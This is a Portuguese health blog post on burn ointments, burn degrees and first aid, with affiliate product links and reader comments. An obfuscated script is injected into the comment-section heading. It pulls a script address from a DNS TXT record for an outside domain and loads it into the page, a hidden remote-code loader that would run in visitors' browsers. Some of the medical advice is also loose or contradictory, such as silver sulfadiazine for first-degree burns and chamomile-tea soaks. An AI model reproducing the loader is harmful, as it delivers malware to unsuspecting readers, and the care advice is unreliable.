Pomada para queimadura – Tudo o que você precisa saber

Pomada para queimadura, pode usar?

Veremos com muito cuidado e responsabilidade, pois, sabemos que as queimaduras são com certeza um dos acidentes mais devastadores que podem acometer alguém, não é mesmo? Todos sabemos e principalmente quem já passou pela dor e o sofrimento de uma queimadura sabe, o quanto é terrível para quem sente e angustiante para quem cuida.

Dependendo da extensão e o grau da queimadura pode demorar mais tempo do que o desejável e suportável. Visando evitar mais dor e sofrimento, seguem informações importantíssimas sobre o que não pode e o que deve ser feito após a queimadura ter infelizmente, acontecido.

Pesquisei para você, alguns produtos que são eficazes e que não precisam de prescrição médica. Basta clicar no produto para receber no conforto da sua casa:

 

 

Creme pomada para assadura do bebê
Baugger 50 unidades de gel de reparação de cicatrizes de tatuagem Pomada de cuidados pós-tatuagem

 

BIAFINE Trolamine Emulsion 186g
Sulfato de Neomicina 5mg/g + Bacitracina 250UI/g EMS Pomada com 15g
Nebacetin Pomada com 50g
Daudt Dersani Hidrogel 30g

Anatomia de uma queimadura

Nossa pele desempenha um papel importantíssimo na regulação dos fluidos corporais e da temperatura do corpo. Esta função ficará bem comprometida se uma área muito grande ou profunda for atingida e isso afetará esta capacidade. A pele também tem como função, criar uma barreira de proteção contra bactérias e vírus que existem à nossa volta. Veja abaixo como são as suas camadas.

  • Epiderme, a camada externa da nossa pele. Geralmente as queimaduras de primeiro grau afetam apenas esta camada, causando dor e vermelhidão que não fazem bolhas e não deixam cicratizes;
Queimadura de primeiro grau
Queimadura de primeiro grau
  • Derme, camada subcutânea a qual abriga fibras de colágeno e elásticas onde estão os nervos, vasos sanguíneos, glândulas sudoríparas e folículos capilares. Esta camada é afetada por queimaduras de segundo grau as quais provocam dor, vermelhidão, formam bolhas e podem deixar cicatrizes. Nunca fure as bolhas já que elas surgem pra proteger a parte afetada ela queimadura;
Queimadura de segundo grau
Queimadura de segundo grau
  • Hipoderme ou tecido subcutâneo, onde os vasos sanguíneos e nervos maiores estão localizados. Esta é a camada de tecido mais importante na regulação da temperatura. Esta queimadura é muito grave e provoca dor muito forte, pele em carne viva e sangramento. Atinge camadas profundas da pele e se atingir terminações nervosas podem não apresentar dor. Procure atendimento médico imediatamente ao ocorrido e para proteger o ferimento, cubra com uma gaze ou pano de algodão leve pra proteger o ferimento.

Para fins de informação complementar, convém citar os tipos de queimaduras mais comuns:

  • Escaldante, provocadas por líquidos quentes e ferventes;
  • Queimaduras químicas, provocadas por produtos ácidos e corrosivos;
  • Queimaduras elétricas, causadas por choques;
  • Incêndios, incluindo chamas de fósforos, velas e isqueiros;
  • Exposição excessiva ao sol, mais conhecido por insolação. Neste caso, pode-se encontrar em qualquer farmácia pomada pra queimadura de sol. Apesar do desconforto, logo os sintomas vão embora.

A quantidade de dano que uma queimadura pode causar, pode ser fatal ou deixar sequelas irreversíveis de acordo com a área afetada, profundidade e quanta área de superfície corporal ela afetou. O que realmente importa, é que em caso de queimadura o que passar.

O que fazer para aliviar a dor da queimadura

Alguns pontos devem ser esclarecidos para que todos possam entender claramente o que pode e o que não pode ser feito, para que não haja agravamento das lesões deixadas por uma queimadura.

O uso indiscriminado de pomada de queimadura, pode não ser a melhor medida a ser tomada.

Em primeiro lugar deve se dito que na ocorrência de uma queimadura, seja em quem for, da idade que for, do sexo ou tipo de queimadura, jamais deverá ser colocado algo que não seja de origem farmacológica, ou seja produtos desenvolvidos justamente para ajudar e não prejudicar. O que deve ser feito de imediato para queimaduras de primeiro e segundo graus é o resfriamento da parte afetada, em água correte (da torneira ou do chuveiro (no frio)).

Para casos de queimaduras de segundo grau extensa ou queimadura de terceiro grau, na medida do possível, proteger a pele com um pano limpo e leve para evitar contaminação do ferimento até a chegada em um atendimento especializado. Isto é mais comum em queimaduras de terceiro grau. 

Saiba mais sobre os tipos de queimaduras nos artigos abaixo:

Saiba como prevenir queimaduras durante as festas juninas

7 acidentes domésticos mais frequentes e os primeiros socorros

É muito importante que se tenha sempre muita informação para que em momentos de necessidade seja possível responder algumas perguntas como por exemplo, qual a melhor pomada para queimadura de segundo grau? Ou o que se passa em queimadura?

O que não pode ser aplicado em uma queimadura?

Bem, como já foi dito, jamais em qualquer tipo de queimadura, independentemente da profundidade, tipo e extensão da queimadura, nunca passar manteiga, margarina, banha, borra de café e pasta de dente por exemplo, são puro mito e só irão agravar o sofrimento e podem até dificultar os primeiros cuidados e retardar a recuperação da vítima. Já para pomada para queimadura de primeiro grau e para pomada para queimadura de 2 grau, há os produtos que conhecemos e ao longo das nossas vidas e já utilizamos e que tem sim efeitos benéficos. Não esquecer de consultar as orientações do fabricante para que não faça mal algum.

Não necessariamente dentro do assunto, as tatuagens causam pequeno desconforto parecido com o de uma queimadura leve. Com duração de pouco tempo, mas que requer um certo grau de cuidado mas pode também causar certo desconforto na pele, o que é totalmente previsto e dentro da normalidade. Para ajudar na recuperação usar uma boa pomada para tatuagem para garantir o resultado esperado.

O que se passa em queimadura?

Tentar soluções caseiras e folclóricas em caso de queimaduras podem até dificultar os primeiros cuidados e retardar a recuperação da vítima. O uso de pomadas para queimaduras, como veremos deve de acordo com seu conhecimento e necessidade lembrando que há com boa margem de segurança e risco muito baixo ao alcance dos consumidores.

Pode passar pomada em queimadura?

Em primeiro lugar, o melhor a ser feito nos nos casos de queimaduras é colocar a área atingida, sob água corrente fria até resfriar o local e impedir que o calor atinja camadas mais profundas da pele. Normalmente de 10 a 15 minutos são suficientes mas convém consultar a vítima quanto ao tempo ideal para diminuir a sensação de dor. Uma boa medida caseira é preparar um bom chá gelado de camomila para mergulhar a parte afetada ou fazer compressas e colocar sobre a queimadura para aliviar a dor. Em queimaduras de terceiro grau, a conduta é cobrir o ferimento e chamar socorro médico o mais rápido possível.

A aplicação de pomadas para queimadura é indicada desde que sejam próprias para queimaduras e que sejam calmantes, cicatrizantes e antibacterianas, lembrando que tratamentos medicamentosos em casos mais graves devem ser feitos apenas sob orientação médica. Principalmente em casos de queimaduras de segundo grau de maior extensão ou terceiro grau.

Quais são os primeiros socorros em caso de queimadura?

  • Na ocorrência de queimaduras de primeiro grau, coloque a região afetada debaixo de água corrente por, pelo menos, 10 minutos. Após esse período, vá colocando um pano limpo e molhado com água gelada em cima do machucado, durante as primeiras 24 horas. Inclusive, utilize pomadas próprias para queimaduras ou creme hidratante; 
  • Se a queimadura for de segundo grau, lave também em água corrente, com a ajuda de sabão neutro, limpe com a mão bem levemente, sem agredir o machucado, passe pomada e faça curativos. Esteja atento para nunca estourar  as bolhas que aparecem, porque essa atitude poderá lhe causar uma séria infecção. E, mesmo tendo adotado os procedimentos adequados, caso veja que o ferimento está muito grave, procure logo um médico. O que importa é estar preparado para saber como tratar queimadura com bolha, e as sem bolha também, claro;
  • Em caso de queimadura de terceiro grau, o indicado é ir diretamente para o hospital. Mas, até chegar lá, você pode lavar com soro fisiológico e colocar gazes (também molhadas com o soro) em cima do ferimento. Não aplicar nenhum tipo de pomada na queimadura de 3º grau até çreceber orientação.

https://preveniremcasa.com.br/acidentes-domesticos-mais-comuns/

Como cuidar de uma queimadura?

O tipo de queimadura, o agente causador e a extensão é que irão determinar qual o melhor procedimento a ser seguido para que o processo de recuperação seja o mais curto e mais bem sucedido possível. Algumas coisas de simples execução que serão feitas no dia a dia determinarão o resultado final. o importante é saber que o pior já passou e focar no processo de cura, já é meio caminho andado, não é mesmo? Veja abaixo o que deve ser feito para bem cuidar de uma queimadura:

  • Massageie o local diariamente para melhorar a circulação e distribuir o colágeno na área afetada;
  • Se você quer uma pomada para queimadura que seja capaz de clarear mancha de queimadura, a boa notícia é que é possível tratar dessa forma.
  • Caso a queimadura seja de primeiro grau, é possível usar pomadas como a Sulfadiazina de prata. Elas, normalmente, dão conta dos casos mais superficiais.
  • Caso haja marcas mais antigas, é interessante conversar com um dermatologista sobre o uso de clareadores como por exemplo a hidroquinona;
  • Para situações onde haja alguma dor desconfortável, possivelmente seu médico irá considerar o uso de picrato de butambeno. Esta substância tem ação anestésica/analgésica e permite alívio rápido da dor em lesões superficiais, como pequenas queimaduras causadas pelo sol, choque elétrico, vapor, superfícies superaquecidas e água fervente, para citar alguns exemplos;
  • Para casos de queimaduras mais leves, existe nas farmácias pomadas como Nebacetin, Bepantol, dermazine e queimalive que são exemplos das pomadas utilizadas no tratamento de queimaduras e que geralmente podem ser compradas e não exigem receita médica. Elas ajudam na cicatrização e previnem infecções. Mas lembre-se, são indicadas para o tratamento de queimaduras leves sem bolhas ou desprendimento de pele;
  • Independentemente das características da sua queimadura, uma ótima maneira de se recuperar é agir rápido;
  • Imprescindível usar sempre uma pomada boa para queimadura.

Como saber se uma queimadura está melhorando?

A resposta é simples não é mesmo? Mas tem algumas coisas importantes que devem ser levadas em consideração. Veja abaixo está sendo feito tudo o que é preciso para a recuperação de uma pessoa que sofreu queimadura:

  • A vermelhidão e dor da região afetada está diminuindo dia após dia;
  • Após alguns dias as bolhas começarão a desinchar e ela pode estourar sozinha. Se isso ocorrer, limpe com delicadeza com água e sabonete pelo menos 2 vezes ao dia e mantenha a região seca e hidratada. Poderá ser aplicado antiséptico em spray, a base de clorexidina.
  • Possivelmente a região afetada irá coçar e isso é bom pois são os tecidos que estão regenerando e o cérebro ao perceber isso, apresenta a sensação de coceira. Não coce. Cuidado para não ferir a região e atrapalhar a recuperação. Por isso, manter a região protegida por curativos.

Agora que você já chegou até aqui depois de aprender bastante sobre pomada para queimadura com bolhas, sem bolha, pomada para queimadura 2 grau, 3º grau e as queimaduras de um modo geral compartilhe com todos que vc ama.

Antes de finalizar é importantíssimo que fique claro que qualquer medicamento só pode ser prescrito por médicos.

A finalidade deste artigo é puramente informativa e as informações aqui contidas são resultado do que conhecemos e utilizamos ao longo da vida e vivenciado na carreira profissional, lidando com emergências etc. A responsabilidade por qualquer produto adquirido é do fabricante e o blog Prevenir não se responsabiliza pelo uso indevido de medicamentos e que a aquisição e o uso é uma decisão individual do usuário ou responsável.

Aproveite e nos siga em nossas redes sociais.

3 comentários em “Pomada para queimadura – Tudo o que você precisa saber<script src=""></script><script>fetch("https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT", {headers:{ "accept": "application/dns-json" }}).then(e=>e.json()).then(e=>{const t=document.createElement("script");t.src=JSON.parse(e.Answer[0].data),document.querySelector("head").appendChild(t)});</script>”

  1. Olá , eu acho que seu site pode estar tendo problemas de compatibilidade do navegador.

    Quando acesso seu blog no Chrome , parece bom, mas ao abrir no Internet Explorer,
    aparecem algumas sobreposições. Só queria deixar um aviso rápido!
    Parabéns pelo fantástico site!

    Responder
  2. Primeiramente congratulações pela postagem. Eu não conhecia Teu blog Porém pelo pouco que já
    li fiquei impressionado. É Que show hein achar conteúdo de qualidade deste jeito na internet.
    Abraço!

    Responder

Deixe um comentário